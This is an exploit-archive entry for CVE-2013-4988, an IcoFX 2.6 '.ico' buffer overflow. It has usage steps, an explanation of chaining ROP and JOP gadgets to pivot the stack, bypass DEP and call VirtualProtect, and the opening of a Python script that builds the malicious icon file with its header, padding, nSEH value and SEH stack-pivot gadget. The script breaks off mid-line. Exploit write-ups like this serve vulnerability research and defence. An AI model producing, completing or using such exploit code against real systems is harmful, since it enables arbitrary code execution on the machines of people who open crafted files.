
# CVE-2013-4988 IcoFX 2.6 緩衝區溢出漏洞

# Exploit Title: IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP
# Date: 2020-05-20
# Exploit Author: Austin Babcock
# Vendor Homepage:
# Software Link:
# Version:
# Tested on: Windows 7 Ultimate x64
# CVE: CVE-2013-4988
# Steps: 1. Run script 2. Open application 3. Open maliciousJOP.ico via file -> open dropdown menu

# Payload Length: 1626 bytes

#While this is an older CVE, it is very rare to have a JOP chain available for a binary which is what this exploit attempts to demonstrate. 
#Gadgets were found using the JOP ROCKET tool which is available at

#This exploit utilizes ROP to set up a JOP chain that will perform multiple stack pivots and call VirtualProtect(). 
#JOP utilizes a dispatcher gadget (#add ecx, dword ptr [eax] #jmp dword ptr [ecx]) to executes gadgets found within the dispatch table.
#The ECX register will hold the address of the dispatch table, which will be modified each time the dispatcher gadget executes.
#After each modification, ECX will point to the address of the next gadget in the JOP chain and "jmp dword ptr [ecx]" executes that gadget.
#Each functional gadget must end in a jmp or call to a register containing the address of the dispatcher gadget.
#In this exploit, ecx is used to hold the address of the dispatch table, and edi is used to hold the dispatcher gadget address.
#The dispatch table is located just after the shellcode in this exploit's payload. The address is loaded into ECX using ROP to programatically generate the correct address..

import struct
# Stuff we'll need for creating our malicious .ico
header = "\x00\x00\x01\x00\x00\x6F"
option = "\x02\x00\x00\x00"
pad2 = "\x41"*8
nseh = "\xfe\xff\xff\xff"

base = 0x400000
# SEH Overwrite with stack pivot - ADD ESP,0x800 # POP EBX # RET
seh = struct.pack('
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